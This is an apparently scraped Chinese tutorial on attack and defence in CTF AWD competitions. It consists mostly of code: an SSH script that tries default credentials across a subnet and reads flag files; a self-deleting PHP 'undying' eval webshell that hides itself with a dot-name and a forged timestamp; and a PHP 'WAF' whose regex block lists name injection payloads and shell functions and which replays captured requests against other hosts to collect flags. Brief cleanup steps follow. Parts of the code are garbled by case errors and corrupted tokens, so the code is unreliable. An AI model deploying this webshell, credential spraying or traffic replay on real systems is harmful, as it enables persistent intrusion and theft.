大佬教程收集整理的这篇文章主要介绍了CTF AWD模式的攻与防,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
#!/usr/bin/python
# -*- coding: utf-8 -*-
# author: 追寻_smile
import paramiko
import threading
def ssh(port, ip, username, passwd, cmd):
try:
#初始化paramiko.client类
ssh = paramiko.SSHClient()
#set_missing_host_key_policy:当SSH服务器的主机名不在系统主机密钥或应用程序的密钥中时,应使用该策略
#AutoaddPolicy():自动将主机名和新主机密钥添加到本地HostKeys对象并保存它
ssh.set_missing_host_key_policy(paramiko.AutoaddPolicy())
#连接到SSH服务器并对其进行身份验证,port默认为22
ssh.connect(ip, port, username, passwd, timeout=1)
# 遍历要执行的命令
for i in cmd:
"""
exec_command(command, bufsize=-1, timeout=None, get_pty=false, environment=NonE)
命令的输入和输出流以类似于Python file的对象的形式返回,它们代表stdin,stdout和stderr。
"""
stdin, stdout, stderr = ssh.exec_command(i)
#读取执行命令后输出的内容
#print(stdout.read())
out = stdout.readlines()
for m in out:
print(ip+':'+m)
print('%s:%st连接成功n' % (ip, port))
#stdin, stdout, stderr = ssh.exec_command(cmd)
# 输出命令执行结果
#result = stdout.read()
#res = result.decode(encoding="utf-8")
#print(res)
ssh.close()
except:
print('%s:%st连接失败n' % (ip, port))
if __name__ == '__main__':
# 执行命令的列表集
cmd = ['cat flag*']
# 用户名
username = "admin"
# 密码
passwd = '123456'
# 多线程
threads = []
print('begin....')
#端口列表
ports = ['22']
#这个循环根据需求自定义
for port in ports:
for j in range(1,51):
ip = '172.16.2.%d' % j
# 多线程 要执行的函数(参数)
a = threading.Thread(target=ssh, args=(port, ip, username, passwd, cmd))
a.start()
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.zx.php';
$code = '<?php if(md5($_GET["keliseng"])=="c4704ba67d00af3d3ff4318343d1529b"){@eval($_POST[zx]);} ?>';
while (1){
file_put_contents($file,$codE);
system('touch -m -d "2018-12-01 09:10:12" .zx.php');
usleep(5000);
}
?>
1..zx.php以.开头可以起到隐藏作用 2."2018-12-01 09:10:12"可以隐藏创建时间,防御者通过find *.php -R_855_11845@min -10 (找到10分钟内修改的php文件)找不到此文件。 3.md5加密保证不死马只为自己所用。
如果主办方没有明令禁止,可以上通防WAF,对于很多典型的漏洞都可以起到作用.
<?php
/**CTF—**/
error_reporTing(0);
class CTF_WAF{
public $getfilter;
public $postfilter;
public $cookiefilter;
public $orther;
public $url;
public $dir;
public $ip;
public $Waf_switch;
public $resultPage;
public function __construct() {
$this->getfilter = "\<.+javascript:window\[.{1}\\x|<.*=(&#\d+?;?)+?>|<.*(data|srC)=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmarks*?(.*)|sleeps*?(.*)|\b(group_)?concat[\s\/\*]*?\([^\)]+?\)|bcase[s/*]*?when[s/*]*?([^)]+?)|load_files*?\()|<[a-z]+?\b[^>]*?\bon([a-z]{4,})s*?=|^\+\/v(8|9)|\b(and|or)\b\s*?([\(\)'"\d]+?=[\(\)'"\d]+?|[\(\)'"a-zA-Z]+?=[\(\)'"a-zA-Z]+?|>|<|s+?[\w]+?\s+?\bin\b\s*?(|\blike\b\s+?["'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?@R_618_10288@CTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)|updatEs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)SET|INSERT\s+INTO.+?VALUES|(SELECT|Delete)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|"))FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|<.*(iframe|frame|style|embed|object|frameset|meta|xml|a|img)|hacker";
//post拦截规则
$this->postfilter = "<.*=(&#\d+?;?)+?>|<.*data=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmarks*?(.*)|sleeps*?(.*)|\b(group_)?concat[\s\/\*]*?\([^\)]+?\)|bcase[s/*]*?when[s/*]*?([^)]+?)|load_files*?\()|<[^>]*?\b(onerror|onmousemove|onload|onclick|onmouseover)\b|\b(and|or)\b\s*?([\(\)'"\d]+?=[\(\)'"\d]+?|[\(\)'"a-zA-Z]+?=[\(\)'"a-zA-Z]+?|>|<|s+?[\w]+?\s+?\bin\b\s*?(|\blike\b\s+?["'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?@R_618_10288@CTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)|updatEs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)SET|INSERT\s+INTO.+?VALUES|(SELECT|Delete)(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|"))FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|<.*(iframe|frame|style|embed|object|frameset|meta|xml|a|img)|hacker";
//cookie拦截规则
$this->cookiefilter = "benchmarks*?(.*)|sleeps*?(.*)|load_files*?\(|\b(and|or)\b\s*?([\(\)'"\d]+?=[\(\)'"\d]+?|[\(\)'"a-zA-Z]+?=[\(\)'"a-zA-Z]+?|>|<|s+?[\w]+?\s+?\bin\b\s*?(|\blike\b\s+?["'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?@R_618_10288@CTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)|updatEs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)SET|INSERT\s+INTO.+?VALUES|(SELECT|Delete)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|"))FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
//其他拦截规则
$this->orther ="eval(.*)|phpinfo()|assert(.*)|`|~|^|<?php|[oc]:d+:|pcntl_alarm|pcntl_fork|pcntl_waitpid|pcntl_wait|pcntl_wifexited|pcntl_wifstopped|pcntl_wifsignaled|pcntl_wifconTinued|pcntl_wexitstatus|pcntl_wtermsig|pcntl_wstopsig|pcntl_signal|pcntl_signal_get_handler|pcntl_signal_dispatch|pcntl_get_last_error|pcntl_strerror|pcntl_sigprOCMask|pcntl_sigwaiTinfo|pcntl_sigtimedwait|pcntl_exec|pcntl_getpriority|pcntl_setpriority|pcntl_async_signals|system(.*)|exec(.*)|sHell_exec(.*)|popen(.*)|proc_open(.*)|passthru(.*)|symlink(.*)|link(.*)|syslog(.*)|imap_open(.*)|flag|cats|etcspasswd|IFS|display_errors|catch|ini_set|set_time_limit(0)";
$this->url = 'http://'.$_SERVER['http_HOST'].$_SERVER['requEST_URI'];
$this->dir = $_SERVER['DOCUMENT_ROOT'].'/'.'waflog/';
$this->ip = [];
$this->read_ip();
$this->resultPage="http://127.0.0.1/";//返回页面
$this->Waf_switch=0;//WAF开关1开启,0关闭
}
public function Flux($Value,$stylE){
switch ($stylE) {
case 'post':
if(is_array($value)){
$Value = http_build_query($value);
}
$this->data_to_file("{"url":"".$this->url."","value":".""".$Value."","style":"Post","time":"".time().""}rn","logs.txt",'post');
$this->check_Flux($Value, $this->postfilter);
$this->check_Flux($Value, $this->orther);
break;
case 'get':
if(is_array($value)){
$Value = http_build_query($value);
}
$this->data_to_file("{"url":"".$this->url."","value":".""".$Value."","style":"Get","time":"".time().""}rn","logs.txt",'get');
$this->check_Flux($Value, $this->getfilter);
$this->check_Flux($Value, $this->orther);
break;
default:
if(is_array($value)){
$Value = http_build_query($value);
}
$this->data_to_file("{"url":"".$this->url."","value":".""".$Value."","style":"Cookie","time":"".time().""}rn","logs.txt",'cookie');
$this->check_Flux($Value, $this->cookiefilter);
$this->check_Flux($Value, $this->orther);
break;
}
}
public function read_ip(){
if(!file_exists($this->dir."ip.txt")){
file_put_contents($this->dir."ip.txt", "");
}
$file = fopen($this->dir."ip.txt", "r") or exit("");
while(!feof($filE))
{
array_push($this->ip, trim(fgets($filE)));
}
fclose($filE);
}
public function check_Flux($Value,$ArrFiltReq){
if($this->Waf_switch==1){
if(is_array($value)){
$Value=implode($value);
}
$Value=urldecode($value);
if (preg_match("/".$ArrFiltReq."/is",$value)==1){
die(file_get_contents($this->resultPagE));
}
}
}
public function request_Post($data,$url){
if(is_array($data)){
$query = http_build_query($data); //使用给出的关联(或下标)数组生成一个经过 URL-encode 的请求字符串。
}else{
$query = $data;
}
$options['http'] = array(
'timeout'=>60,
'method' => 'POST',
'header' => 'Content-type:application/x-www-form-urlencoded',
'content' => $query
);//构造一个post包
//vardump($options['http'] );_
$context = stream_context_create($options);//创建并返回一个资源流上下文
$result = file_get_contents($url, false, $context);
return $result;
}
public function request_Get($url){
$result=[];
$result['content'] = file_get_contents($url);
preg_match_all('///(.*?)//', $url, $ip);
$result['ip'] = $ip[1][0];
return $result;
}
public function Get_Flag($result){
//var_dump($result);
if(Stristr($result['content'],'flag')){
preg_match_all('/flag{(.*?)}/', $result['content'],$flag);
if(!empty($flag[0][0])){
$this->data_to_file("{$result['ip']}t| ".$flag[0][0]."rn","flag.txt",'flag');
}
}
}
public function data_to_file($data,$filename,$style=''){
if(is_array($data)){
$data = implode($data);
}
switch ($stylE) {
case 'post':
if(!Stristr(file_get_contents($this->dir.$fileName),$data)){
if(file_exists($this->dir.$fileName)){
file_put_contents($this->dir.$filename,"".$data,FILE_APPEND);
}else{
file_put_contents($this->dir.$filename,$data,FILE_APPEND);
}
for($i=0;$i<count($this->ip);$i++){
$this->Get_Flag($this->request_Post(json_decode(str_replace("rn","",$data),truE)['value'],'http://'.$this->ip[$i].'/'));
}
}
break;
case 'get':
$js_data = $data;
if(!Stristr(file_get_contents($this->dir.$fileName),str_replace('http://'.$_SERVER['http_HOST'], '', $data))){
file_put_contents($this->dir.$filename, $js_data ,FILE_APPEND);
for($i=0;$i<count($this->ip);$i++){
$data=str_replace($_SERVER['http_HOST'],$this->ip[$i],json_decode(str_replace("rn","",$data),truE)['url']);
$this->Get_Flag($this->request_Get($data));
$data=$js_data ;
}
}
break;
case 'cookie':
if(!Stristr(file_get_contents($this->dir.$fileName),$data)){
if(file_exists($this->dir.$fileName)){
file_put_contents($this->dir.$filename,"".$data,FILE_APPEND);
}else{
file_put_contents($this->dir.$filename,$data,FILE_APPEND);
}
}
break;
case 'flag':
if(!Stristr(file_get_contents($this->dir.$fileName),$data)){
file_put_contents($this->dir.$filename,$data,FILE_APPEND);
}
break;
}
}
}
/*******************************/
/* 调用WAF */
$waf = new CTF_WAF();
if(isset($_GET)){
$waf->Flux($_GET,'get');
}
if(isset($_POST)){
$waf->Flux($_POST,'post');
}
if(isset($_COOKIE)){
$waf->Flux($_COOKIE,'cookie');
}
查杀不死马
1.find *.php -R_855_11845@min -10 #找到10分钟内修改的php文件,如果有的话删除
2.ps -aux 查看进程,kill 掉不死马,或者上传同名文件,不死马则失效。
以上是大佬教程为你收集整理的CTF AWD模式的攻与防全部内容,希望文章能够帮你解决CTF AWD模式的攻与防所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。